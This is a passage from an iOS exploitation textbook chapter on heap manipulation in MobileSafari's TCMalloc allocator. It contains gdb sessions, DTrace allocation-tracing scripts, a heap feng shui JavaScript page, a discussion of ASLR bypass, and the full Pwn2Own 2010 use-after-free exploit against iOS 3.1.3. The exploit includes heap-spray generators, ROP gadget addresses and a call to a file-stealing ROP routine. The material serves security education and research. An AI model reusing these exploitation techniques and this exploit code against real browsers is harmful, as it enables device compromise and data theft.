You can find the MobileSafari JavaScript engine, codenamed Nitro, in the JavascriptCore folder inside the WebKit distribution. Each object allocated through JavaScript is wrapped into a JSCell structure. The TCMalloc garbage collector is heavily influenced by the Nitro behavior. In fact, until JSCells are in use, those memory objects will not be freed.

To better understand this concept, take a look at the deallocation process of an HTML div object inside MobileSafari. You first allocate 10 HTML div objects, then you deallocate them and use a function (in this case Math.acos) to understand from the debugger when the deallocation is supposed to happen. Finally, you allocate a huge number of objects and see when the actual deallocation of the object happens:

Breakpoint 6, 0x9adbc1bb in WebCore::HTMLDivElement::create ()
(gdb) info reg
eax            0x28f0c0     2683072
ecx            0x40  64
edx            0x40  64
ebx            0xc006ba88  -1073300856
esp            0xc006b2a0  0xc006b2a0
ebp            0xc006b2b8  0xc006b2b8
esi            0x9adbc1ae  -1696874066
edi            0xc006ba28  -1073300952
eip            0x9adbc1bb  0x9adbc1bb
<WebCore::HTMLDivElement::create(WebCore::QualifiedName const&,
WebCore::Document*)+27>
eflags         0x282  642
cs             0x1b  27
ss             0x23  35
ds             0x23  35
es             0x23  35
fs             0x0  0
gs             0xf  15
(gdb) awatch *(int *)0x28f0c0
Hardware access (read/write) watchpoint 8: *(int *) 2683072
(gdb) c
Continuing.
Hardware access (read/write) watchpoint 8: *(int *) 2683072

The div object is stored in EAX. You set a memory watchpoint on it to be able to track it during the execution.

Breakpoint 4, 0x971f9ee5 in JSC::mathProtoFuncACos ()
(gdb)

Now you have reached the point where the object is supposed to be deallocated, but the output shows that the object is still allocated as far as TCMalloc is concerned. Continuing further you get the following:

(gdb) continue
Continuing.
Hardware access (read/write) watchpoint 8: *(int *) 2683072

Value = -1391648216
0x9ad7ee0e in WebCore::JSNodeOwner::isReachableFromOpaqueRoots ()
(gdb)
Continuing.
Hardware access (read/write) watchpoint 8: *(int *) 2683072

Value = -1391648216
0x9ad7ee26 in WebCore::JSNodeOwner::isReachableFromOpaqueRoots ()
(gdb)
Continuing.
Hardware access (read/write) watchpoint 8: *(int *) 2683072

Old value = -1391648216
New value = -1391646616
0x9b4f141c in non-virtual thunk to WebCore::HTMLDivElement::∼HTMLDivElement() ()
(gdb) bt 20
#0  0x9b4f141c in non-virtual thunk to WebCore::HTMLDivElement
::∼HTMLDivElement() ()
#1  0x9adf60d2 in WebCore::JSHTMLDivElement::∼JSHTMLDivElement ()
#2  0x970c5887 in JSC::MarkedBlock::sweep ()
Previous frame inner to this frame (gdb could not unwind past this frame)
(gdb)

So the object is freed only after the Nitro garbage collector is invoked. It is pretty vital, then, to understand when and how the Nitro garbage collector is triggered.

The Nitro garbage collector is invoked in three scenarios:

After a timeout that is set at compile time
After the JavaScript global data are destroyed (that is, when a thread dies)
When the number of bytes allocated exceeds a certain threshold

Clearly, the easiest option to control the garbage collector is with the third scenario. The process is pretty much the same as the one that triggered it in the previous example. A number of objects can be used to trigger the behavior of the third scenario, for instance images, arrays, and strings. You see later that in the Pwn2Own case study, strings and arrays are used, but the choice of the object depends on the bug in question.

The next important step is to find objects over which you have as much control as possible, and use those to tame the heap, and, in case of object lifetime issues, replace the faulty object. Usually, strings and arrays fit the purposes fine. What you need to pay particular attention to, most of the time, is the ability to control the first four bytes of the object you are using for replacing the faulty ones, because those four bytes are where the virtual function table pointer is located, and controlling it is usually the easiest way to obtain code execution.

Tools for Debugging Heap Manipulation Code

Debugging heap manipulation code can be tricky, and no default Mac OS X or iPhone tools offer support for TCMalloc heap debugging. Because the implementation of TCMalloc used on the iPhone is the same one used on Mac OS X, you can perform all the debugging needed on Mac OS X using Dtrace. This section doesn't cover the details of Dtrace or the D language, but presents two scripts that ease the debugging process. These scripts will be extremely useful for your exploitation work.

The first script records allocations of all sizes and prints a stack trace:

#pragma D option mangled

BEGIN
{
     printf("let's start with js tracing");
}


pid$target:JavaScriptCore:_ZN3WTF10fastMallocEm:entry
{
     printf("Size %d
", arg0);
     ustack(4);

}

The second one allows you to trace allocations and deallocations of a specific size:

#pragma D option mangled
BEGIN
{
     printf("let's start with allocation tracing");
}


pid$target:JavaScriptCore:_ZN3WTF10fastMallocEm:entry
{
     self->size = arg0;
}

pid$target:JavaScriptCore:_ZN3WTF10fastMallocEm:return
/self->size == 60/
{
     printf("Pointer 0x%x
", arg1);
     addresses[arg1] = 1;
     ustack(2);
}

pid$target:JavaScriptCore:_ZN3WTF8fastFreeEPv:entry
/addresses[arg0]/
{
     addresses[arg0] = 0;
     printf("Object freed 0x%x
", arg0);
     ustack(2);
}

The only thing you need to do to port results from Mac OS X to iOS is determine the correct object sizes; those sizes might change between the two versions. Doing this is relatively easy; in fact, most of the time it is possible to locate the size of the object you are dealing with in a binary. Alternatively, by using BinDiff on the Mac OS X and iOS WebKit binary, it is often possible to understand the size.

Another invaluable tool when it comes to debugging heap sprays is vmmap. This allows you to see the full content of the process address space. Grepping for JavaScript in the vmmap output shows which regions of memory are allocated by TCMalloc. Knowing common address ranges is useful when you have to do some guesswork on addresses (for instance, when pointing a fake vtable pointer to an attacker-controlled memory location).

In general, it is preferable when developing an exploit for iOS to debug it using the 32-bit version of Safari on Mac OS X instead of the 64-bit one. This way, the number of differences in terms of object sizes and allocator between the two will be significantly lowered.

Exploiting Arithmetic Vulnerabilities with TCMalloc—Heap Feng Shui

Armed with knowledge of the allocator, the ways to trigger the garbage collector, and the objects to use, you can now proceed with shaping the heap.

The plan is pretty straightforward; the first step is to allocate a number of objects to defragment the heap. This is not rocket science, and depending on the state of the heap at the beginning of the execution of the exploit, the number of objects needed may change slightly. Defragmenting the heap is pretty important because this way it is possible to guarantee that the following objects will be allocated consecutively in-memory. Once the heap is defragmented, the goal is to create holes in between objects on the heap. To do so, first a bunch of objects are allocated, and then every other object is freed. At this stage, you are all set to allocate the vulnerable object. If the defragmentation worked as expected, the heap will contain the vulnerable object in between two objects of your choice.

The last step is to trigger the bug and obtain code execution.

The following code snippet illustrates the process that needs to be carried out to obtain the correct heap layout. You can use the Dtrace script shown in the previous section to trace the allocations and verify that the JavaScript code is working properly:

<html>
<body onload="start()">
<script>

var shui = new Array(10000);
var gcForce = new Array(30000); //30000 should be enough to
trigger a garbage collection
var vulnerable = new Array(10);

function allocateObjects()
{
     for(i = 0; i < shui.length; i++)
          shui[i] = String.fromCharCode(0x8181, 0x8181, 0x8181, 0x8181,
 0x8181, 0x8181,
 0x8181, 0x8181, 0x8181, 0x8181, 0x8181, 0x8181, 0x8181, 0x8181, 0x8181,
 0x8181, 0x8181,
 0x8181, 0x8181, 0x8181);
}

function createHoles()
{
     for(i = 0; i < shui.length; i+=2)
          delete shui[i];
}

function forceGC() {
     for(i = 0; i < gcForce.length; i++)
          gcForce[i] = String.fromCharCode(0x8282, 0x8282, 0x8282,
0x8282, 0x8282, 0x8282,
0x8282, 0x8282, 0x8282, 0x8282, 0x8282, 0x8282, 0x8282, 0x8282, 0x8282,
 0x8282, 0x8282,
0x8282, 0x8282, 0x8282, 0x8282, 0x8282, 0x8282, 0x8282, 0x8282, 0x8282,
 0x8282, 0x8282,
0x8282, 0x8282, 0x8282, 0x8282, 0x8282, 0x8282, 0x8282, 0x8282, 0x8282,
 0x8282, 0x8282,
0x8282, 0x8282, 0x8282, 0x8282, 0x8282, 0x8282, 0x8282, 0x8282, 0x8282,
 0x8282, 0x8282,
0x8282, 0x8282, 0x8282, 0x8282, 0x8282, 0x8282, 0x8282, 0x8282, 0x8282,
 0x8282, 0x8282,
0x8282, 0x8282, 0x8282);

}

function allocateVulnerable() {
     for(i = 0; i < vulnerable.length; i++)
          vulnerable[i] = document.createElement("div");
}


function start() {
     alert("Attach here");
     allocateObjects();
     createHoles();
     forceGC();
     allocateVulnerable();
}

</script>

</body>
</html>

Before you can fully understand this code, you need to consider some things. First of all, it is vital to understand the size of the vulnerable object; in this case you are dealing with a 60-byte HTML div element. You can use different methods to ascertain the size of the object: either trace it dynamically in a debugger, use another Dtrace script, or statically determine it by looking at the constructor of the object in a disassembler.

When the object size is known, the second thing you need to do is find a way to properly replace the object. Looking into the WebKit source code you can find the following code initializing a string:

PassRefPtr<StringImpl> StringImpl::createUninitialized(
unsigned length, UChar*& data)
{
    if (!length) {
        data = 0;
        return empty();
    }

    // Allocate a single buffer large enough to contain the StringImpl
    // struct as well as the data which it contains. This removes one
    // heap allocation from this call.
    if (length > ((std::numeric_limits<unsigned>::max() - sizeof(StringImpl)) /
sizeof(UChar)))
        CRASH();
    size_t size = sizeof(StringImpl) + length * sizeof(UChar);
    StringImpl* string = static_cast<StringImpl*>(fastMalloc(size));

    data = reinterpret_cast<UChar*>(string + 1);
    return adoptRef(new (string) StringImpl(length));
}

So, it appears that an attacker can easily control the size of the allocation. In the past, strings were even better in that the attacker had total control over the whole content of the buffer. These days, strings turn out to be less useful because no obvious ways exist to control the first four bytes of the buffer. Nonetheless, for the purpose of this chapter you will be using them because they can be sized easily to fit any vulnerable object size that might be needed.

Of particular importance is the way the length of the string is calculated:

size_t size = sizeof(StringImpl) + length * sizeof(UChar);

This tells you how many characters you need to put in your JavaScript code. The size of SringImpl is 20 bytes, and a UChar is two bytes long. Therefore, to allocate 60 bytes of data you need 20 characters in the JavaScript string.

At this point you are all set to verify that the code is working properly, that is, the HTML div elements are allocated between strings.

Running this code in the browser and tracing the output with the Dtrace script provided earlier shows the following output:

snaggs-MacBook-Air:∼ snagg$sudo dtrace -s Documents/Trainings/Mac hacking
training/Materials/solutions_day2/9_WebKit/traceReplace.d  -p 1498 -o out2
dtrace: script ‘Documents/Trainings/Mac hacking
training/Materials/solutions_day2/9_WebKit/traceReplace.d’ matched 6 probes
dtrace: 2304 dynamic variable drops
dtrace: error on enabled probe ID 6 (
ID 28816: pid1498:JavaScriptCore:_ZN3WTF8fastFreeEPv:entry):
invalid address (0x3) in action #3
ˆCsnaggs-MacBook-Air:∼ snagg$
snaggs-MacBook-Air:∼ snagg$cat out2 | grep HTMLDiv
             
WebCore‘_ZN7WebCore14HTMLDivElement6createERKNS_13QualifiedNameEPNS
_8DocumentE+0x1b
             
WebCore‘_ZN7WebCore14HTMLDivElement6createERKNS_13QualifiedNameEPNS
_8DocumentE+0x1b
             
WebCore‘_ZN7WebCore14HTMLDivElement6createERKNS_13QualifiedNameEPNS
_8DocumentE+0x1b
             
WebCore‘_ZN7WebCore14HTMLDivElement6createERKNS_13QualifiedNameEPNS
_8DocumentE+0x1b
             
WebCore‘_ZN7WebCore14HTMLDivElement6createERKNS_13QualifiedNameEPNS
_8DocumentE+0x1b
             
WebCore‘_ZN7WebCore14HTMLDivElement6createERKNS_13QualifiedNameEPNS
_8DocumentE+0x1b
             
WebCore‘_ZN7WebCore14HTMLDivElement6createERKNS_13QualifiedNameEPNS
_8DocumentE+0x1b
             
WebCore‘_ZN7WebCore14HTMLDivElement6createERKNS_13QualifiedNameEPNS
_8DocumentE+0x1b
             
WebCore‘_ZN7WebCore14HTMLDivElement6createERKNS_13QualifiedNameEPNS
_8DocumentE+0x1b
             
WebCore‘_ZN7WebCore14HTMLDivElement6createERKNS_13QualifiedNameEPNS
_8DocumentE+0x1b
snaggs-MacBook-Air:∼ snagg$cat out2 | grep HTMLDiv | wc -l
      10

You have the 10 vulnerable objects in the Dtrace output. By attaching to the process with gdb you can verify that the div objects are allocated between strings. Arbitrarily picking one of the 10 vulnerable objects from the Dtrace output, you have:

2   8717    _ZN3WTF10fastMallocEm:return Pointer 0x2e5ec00

              JavaScriptCore‘_ZN3WTF10fastMallocEm+0x1b2
             
WebCore‘_ZN7WebCore14HTMLDivElement6createERKNS_13QualifiedNameEPNS
_8DocumentE+0x1b

Now you can inspect the memory with gdb:

(gdb) x/40x 0x2e5ec00
0x2e5ec00:     0xad0d2228     0xad0d24cc     0x00000001     0x00000000
0x2e5ec10:     0x6d2e8654     0x02f9cb00     0x00000000     0x00000000
0x2e5ec20:     0x00000000     0x0058003c     0x00000000     0x00000000
0x2e5ec30:     0x00306ed0     0x00000000     0x00000000     0x00000000
0x2e5ec40:     0x02e5e480     0x00000014     0x02e5ec54     0x00000000
0x2e5ec50:     0x00000000     0x81818181     0x81818181     0x81818181
0x2e5ec60:     0x81818181     0x81818181     0x81818181     0x81818181
0x2e5ec70:     0x81818181     0x81818181     0x81818181     0x00000010
0x2e5ec80:     0x00000000     0x00000030     0x00000043     0x00000057
0x2e5ec90:     0x00000000     0x81818181     0x81818181     0x81818181
(gdb) x/40x 0x2e5ec00 - 0x40
0x2e5ebc0:     0x02e5ed00     0x00000014     0x02e5ebd4     0x00000000
0x2e5ebd0:     0x00000000     0x81818181     0x81818181     0x81818181
0x2e5ebe0:     0x81818181     0x81818181     0x81818181     0x81818181
0x2e5ebf0:     0x81818181     0x81818181     0x81818181     0x82828282
0x2e5ec00:     0xad0d2228     0xad0d24cc     0x00000001     0x00000000
0x2e5ec10:     0x6d2e8654     0x02f9cb00     0x00000000     0x00000000
0x2e5ec20:     0x00000000     0x0058003c     0x00000000     0x00000000
0x2e5ec30:     0x00306ed0     0x00000000     0x00000000     0x00000000
0x2e5ec40:     0x02e5e480     0x00000014     0x02e5ec54     0x00000000
0x2e5ec50:     0x00000000     0x81818181     0x81818181     0x81818181
(gdb)

It is clear that both before and after the div object you have two strings with your own content (0x8181).

The importance of being able to overwrite application-specific data in TCMalloc lies in the fact that, similar to what it is done for objects in the large region in magazine malloc, the heap metadata is stored separately from each heap block. Therefore, overwriting a TCMalloc'd buffer will not overwrite heap metadata, but rather the buffer allocated after it. Thus, it is not possible to take advantage of the typical old heap exploitation techniques used to obtain code execution.

Exploiting Object Lifetime Issues with TCMalloc

When it comes to object lifetime issues, it is not strictly necessary to have the vulnerable object in between two objects over which you have control. It is more important to ensure that you are able to replace the object with good reliability. In this scenario, the first step of the attack is to allocate one or more vulnerable objects. Afterwards, the action that triggers the release of the object needs to be performed. The next step is to allocate enough objects of the same size of the vulnerable object to make sure that a garbage collection occurs, and at the same time that the vulnerable object is replaced with an object of your choice. At this point the only step left is to trigger a “use” condition to obtain code execution.

It is important to note that the same procedure used for arithmetic vulnerabilities can be used for object lifetime issues as well. However, in that case you must pay particular attention to the size of the objects you use and the number of objects you allocate. In fact, the first time you defragment the heap, a garbage collection occurs; therefore, to trigger the garbage collector another time after the object is freed, a higher number of objects is required.

The same problem occurs when you free the objects in between the ones you control; to make sure that the vulnerable object is placed in a hole, another garbage collection must be triggered. Given the structure of TCMalloc, it is clear that the ideal way of triggering the garbage collector to exploit the vulnerability is to use objects of a different size than the vulnerable one. In fact, by doing so the freelist for the vulnerable object will not change much and you avoid jeopardizing the success of your exploit.

ASLR Challenges

Up to version 4.3 it was possible to develop a Return Oriented Programming (ROP) payload and an exploit for iOS without worrying too much about Address Space Layout Randomization (ASLR). In fact, although there was still some guesswork involved in understanding where attacker-controlled data would be placed in the process address space, there were no problems in terms of ROP payload development because all the libraries, the main binary, and the dynamic linker were all placed at predictable addresses.

Starting with iOS 4.3, Apple introduced full address space layout randomization on the iPhone.

ASLR on iOS randomizes all the libraries that are stored together in dyld_shared_cache — the dynamic linker, the heap, the stack — and if the application supports position independent code, the main executable is randomized as well.

This poses numerous problems for attackers, mainly for two reasons. The first one is the inability to use ROP in their payload, and the second one is the guesswork involved with finding the address where attacker-controlled data might be placed.

There is no one-size-fits-all way to defeat ASLR. Quite the contrary — every exploit has its own peculiarities that might provide a way to leak addresses useful to an attacker.

A good example of ASLR defeat through repurposing an overflow is the Saffron exploit by comex. In that exploit, a missing check on an argument counter allowed an attacker to read and write from the following structure:

  typedef struct  T1_DecoderRec_
  {
    T1_BuilderRec        builder;

    FT_Long              stack[T1_MAX_CHARSTRINGS_OPERANDS];
    FT_Long*             top;

    T1_Decoder_ZoneRec   zones[T1_MAX_SUBRS_CALLS + 1];
    T1_Decoder_Zone      zone;

    FT_Service_PsCMaps   psnames;      /* for seac */
    FT_UInt              num_glyphs;
    FT_Byte**            glyph_names;

    FT_Int               lenIV;        /* internal for sub routine calls */
    FT_UInt              num_subrs;
    FT_Byte**            subrs;
    FT_PtrDist*          subrs_len;    /* array of subrs length (optional) */

    FT_Matrix            font_matrix;
    FT_Vector            font_offset;

    FT_Int               flex_state;
    FT_Int               num_flex_vectors;
    FT_Vector            flex_vectors[7];

    PS_Blend             blend;       /* for multiple master support */

    FT_Render_Mode       hint_mode;

    T1_Decoder_Callback  parse_callback;
    T1_Decoder_FuncsRec  funcs;

    FT_Long*             buildchar;
    FT_UInt              len_buildchar;

    FT_Bool              seac;

  } T1_DecoderRec;

The attacker then read a number of pointers, including parse_callback, and stored a ROP payload constructed with the knowledge obtained by the out-of-bound read in the buildchar member. Finally, the attacker overwrote the parse_callback member and triggered a call to it. At that point, the ASLR-defeating ROP payload was executed.

In general, the burden of defeating ASLR and the lack of generic methods to use greatly increases the development effort that an attacker has to put into each exploit. More importantly, while in the past it was possible to get away with guesswork because libraries were not randomized, and therefore constructing a payload was not a problem, from 4.3 on, an exploit must defeat ASLR to be successful.

The next section analyzes an exploit for MobileSafari that did not need to bypass ASLR.

Case Study: Pwn2Own 2010

This case study presents the Pwn2Own exploit used in 2010. For the scope of this chapter we have taken out the payload that was used because ROP concepts are properly explained and commented in a different chapter of the book.

The function pwn() is responsible for bootstrapping the exploit. The first thing that is done in there is to generate a JavaScript function that creates an array of strings. The strings are created using the fromCharCode() function, which guarantees that you create a string of the correct size (see the example on heap feng shui in the paragraph describing exploitation techniques against TCMalloc for more details on the string implementation in WebKit). Each string is the size of the object that needs to be replaced (20 UChars that are 40 bytes) and the number of strings to allocate (4000 in this case). The rest of the parameters specify the content of the string. It will be filled with some exploit-specific data and the rest of it will be filled with an arbitrary value (0xCCCC).

The vulnerability itself is caused by attribute objects that were not properly deleted from the Node cache when the attributes were deallocated. The rest of the pwn() function takes care of allocating a number of attribute objects and to remote them right after the allocation.

At this point the exploit triggers the garbage collector by calling the nodeSpray() function, which is the function generated at the beginning by genNodeSpray(). In addition to triggering the garbage collector, and thus making sure that the attributes are released by the allocator, it also replaces them with strings of the correct size.

The last step is to spray the heap with the shellcode that needs to be executed and trigger a call to a virtual function (focus() in this case). This way the first four bytes of the string that is used to replace the object act as a virtual table pointer and divert the execution to a location the attacker controls.

<html>
<body onload="pwn()">
<script>

function genNodeSpray3GS (len, count, addy1, addy2, ret1, ret2, c,
objname) {
      var evalstr = "function nodeSpray()
{ for(var i = 0; i < " + count + "; i++) { ";

      evalstr += objname + "[i]" + " = String.fromCharCode(";
     
      var slide = 0x1c;
     
      for (var i = 0; i < len; i++) {
            if (i == 0 ) {
                  evalstr += addy1;
            } else if (i == 1 || i == 17) {
                  evalstr += addy2;
                  evalstr += addy1 + slide;
            }else if(i == 18) {
                  evalstr +=ret2;
            }else if(i == 19) {
                  evalstr += ret1;
            } else if (i > 1 && i< 4) {
                  evalstr += c;
            } else {
                  evalstr += 0;
            }
            if (i != len-1) {
                  evalstr += ",";
            }
      }
      evalstr += "); }}";

      return evalstr;
}

function genNodeSpray (len, count, addy1, addy2, c, objname) {
      var evalstr = "function nodeSpray() { for
(var i = 0; i < " + count + "; i++) { ";

      evalstr += objname + "[i]" + " = String.fromCharCode(";
     
      for (var i = 0; i < len; i++) {
            if (i == 0) {
                  evalstr += addy1;
            } else if (i == 1) {
                  evalstr += addy2;
            } else if (i > 1 && i< 4) {
                  evalstr += c;
            } else {
                  evalstr += 0;
            }
            if (i != len-1) {
                  evalstr += ",";
            }
      }
      evalstr += "); }}";

      return evalstr;
}

function pwn()
{
      var obj = new Array(4000);
      var attrs = new Array(100);

      // Safari 4.0.5 (64 bit, both DEBUG & RELEASE) 74 bytes -> 37 UChars
      // Safari 4.0.5 (32 bit, both DEBUG & RELEASE) 40 bytes -> 20 UChars
      // MobileSafari/iPhone 3.1.3 40 bytes -> 20 UChars
      // 0x4a1c000 --> 0 open pages
      // 0x4d00000 --> 1 open page
     
      // 3g 0x5000000
      //eval(genNodeSpray(20, 8000, 0x0000, 0x0500, 52428, "obj"));

      eval(genNodeSpray3GS
(20, 4000, 0x0000, 0x0600, 0x328c, 0x23ef, 52428, "obj"));
     
      // iOS 3.1.3 (2G/3G):
      // gadget to gain control of SP, located at 0x33b4dc92 (libSystem)
      //
      // 33b4dc92            469d        mov     sp, r3
      // 33b4dc94            bc1c        pop     {r2, r3, r4}
      // 33b4dc96            4690        mov     r8, r2
      // 33b4dc98            469a        mov     sl, r3
      // 33b4dc9a            46a3        mov     fp, r4
      // 33b4dc9c            bdf0        pop     {r4, r5, r6, r7, pc}
      //
      // note that we need to use jumpaddr+1 to enter thumb mode
      // [for iOS 3.0 (2G/3G) use gadget at 0x31d8e6b4]
      //
      //
      // iOS 3.1.3 3GS:
      //
      // gadget to gain control of SP, a bit more involved we can't mov r3 in sp
so we do it in two stages:
      //
      // 3298d162            6a07        ldr     r7, [r0, #32]
      // 3298d164        f8d0d028        ldr.w   sp, [r0, #40]
      // 3298d168            6a40        ldr     r0, [r0, #36]
      // 3298d16a            4700        bx      r0
      //
      // r0 is a pointer to the crafted node. We point r7 to our crafted stack,
and r0 to 0x328c23ee.
      // the stack pointer points to something we don't control as the node is
40 bytes long.
      //
      // 328c23ee        f1a70d00        sub.w   sp, r7, #0      ; 0x0
      // 328c23f2            bd80        pop     {r7, pc}
      //
     
      //3GS
      var trampoline = "123456789012" + encode_uint32(0x3298d163);
      //var ropshellcode = vibrate_rop_3_1_3_gs();
     
      //we have to skip the first 28 bytes
      var ropshellcode = stealFile_rop_3_1_3_gs(0x600001c);
     
      //3G
      //var trampoline = "123456789012" + encode_uint32(0x33b4dc93);
      //var ropshellcode = vibrate_rop_3_1_3_g();
     
      for(var i = 0; i < attrs.length; i++) {
            attrs[i] = document.createAttribute(‘PWN’);
            attrs[i].nodeValue = 0;
      }

      // dangling pointers are us.
      for(var i = 0; i < attrs.length; i++) {
      // bug trigger (used repeatedly to increase reliability)
            attrs[i].removeChild(attrs[i].childNodes[0]);
      }

      nodeSpray();

      // no pages open: we can spray 10000 strings w/o SIGKILL
      // 1 page open: we can only spray 8000 strings w/o SIGKILL
      var retaddrs = new Array(20000);
     
      for(var i = 0; i < retaddrs.length; i++) {
            retaddrs[i] = trampoline + ropshellcode;
      }

      // use after free on WebCore::Node object
      // overwritten vtable pointer gives us control over PC
      attrs[50].childNodes[0].focus();
}
</script>
</body>
</html>

Testing Infrastructure

A number of difficulties become apparent when it comes to determining the most appropriate testing infrastructure to use while developing an exploit.

You have a number of factors to consider when testing an exploit. First of all, the application version used for testing needs to be the same as or as close as possible to the one the exploit is supposed to work on. The allocator functioning on the testing platform needs to be as close as possible to the real one. Finally, there must be an easy way to test the exploit multiple times.

In general, while developing, it is always a good idea to have tools like diff for source code or BinDiff for binaries that allow you to explore the differences between the real system and the testing one.

In a similar fashion to the processes you've seen in the course of this chapter, where most of the tests were conducted on Mac OS X, it is often possible to use a virtual machine or a computer running Mac OS X to start the development. In fact, by diffing either the source code or the binary it is possible to identify the characteristics common to the testing environment and the deployment environment.

Usually, you can use two strategies to test an exploit. The first one starts by developing it for Mac OS X on 32-bits (in a virtual machine in case you are dealing with the system heap), then porting it to a jailbroken iPhone, and finally, testing it on a non-jailbroken one. Using this method allows you to get around the problem of not having a debugger available on a non-jailbroken iPhone.

The second strategy is applicable only if the vulnerability can be reproduced in a test program. That is, it is possible to include the vulnerable library or framework in a test application to be deployed on a developer iPhone and mimic the triggering conditions from the test application. This strategy is rarely applicable, but when it is, it allows you to debug the exploit directly on the phone by using the Xcode debugging capabilities for iPhone applications.

Finally, it is vital to not make any assumptions on the capabilities of the exploit in the test environment. In fact, applications on the iPhone are sandboxed in a fashion that might be different from Mac OS X. Moreover, jailbreaking an iPhone changes the underlying security infrastructure of the phone severely, thus it is always better to test the payload intended to be run with the exploit separately.

In Chapter 8 you see a few ideas on how to perform such testing.

Summary

This chapter explored the inner mechanisms of the two most used allocators on iOS. It used Mac OS X as a testing platform to do most of the grudge work involved in exploitation.

A number of techniques to control both TCMalloc and the system heap were explained. Specifically, this chapter strove to divide techniques based on the kinds of vulnerabilities for which they are the most suitable. You saw what challenges exploitation on newer versions of the iPhone firmware create, specifically the problem of creating a reliable and portable exploit due to ASLR.

Finally, you saw a real-life example of a MobileSafari exploit targeting iOS 3.1.3, and learned strategies to precisely test an exploit without incurring porting problems and wrong assumptions.

..................Content has been hidden....................

You can't read the all page of ebook, please click here login for view all page.

Table of Contents for Chapter 7: Exploitation

Create new playlist

Sign In

Sign Up